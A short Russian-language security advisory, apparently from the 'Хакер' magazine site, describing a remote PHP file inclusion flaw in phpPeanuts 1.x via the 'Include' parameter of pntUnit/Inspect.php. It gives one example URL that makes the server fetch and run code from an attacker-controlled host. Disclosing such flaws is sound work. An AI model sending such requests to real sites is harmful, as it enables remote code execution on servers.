PHP-инклюдинг в phpPeanuts

Рекомендуем почитать:

Хакер #307. Угон сессий Windows

Содержание выпуска
Подписка на «Хакер»-60%

Программа: phpPeanuts 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "Include" сценарием pntUnit/Inspect.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt?

PHP-инклюдинг в phpPeanuts

Хакер #307. Угон сессий Windows

Подпишись на наc в Telegram!

Из рубрики «Взлом»

COM в ловушке. Атакуем Windows через объекты Trapped COM

HTB MagicGardens. Эксплуатируем переполнение буфера и повышаем привилегии в Linux

Хакеры.RU. Глава 0х0E. Следующий уровень

File Inclusion и Path Traversal. Разбираем две базовые веб-уязвимости

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Apple исправила 0-day уязвимость, использовавшуюся в «чрезвычайно сложных» атаках

Хакер продает коды доступа для 20 млн аккаунтов OpenAI

Браузер Brave позволит внедрять кастомный JavaScript в код сайтов

За один день группа TA558 разослала более 76 000 фишинговых писем

Ради борьбы с мошенниками правительство готовит изменения в десятках законов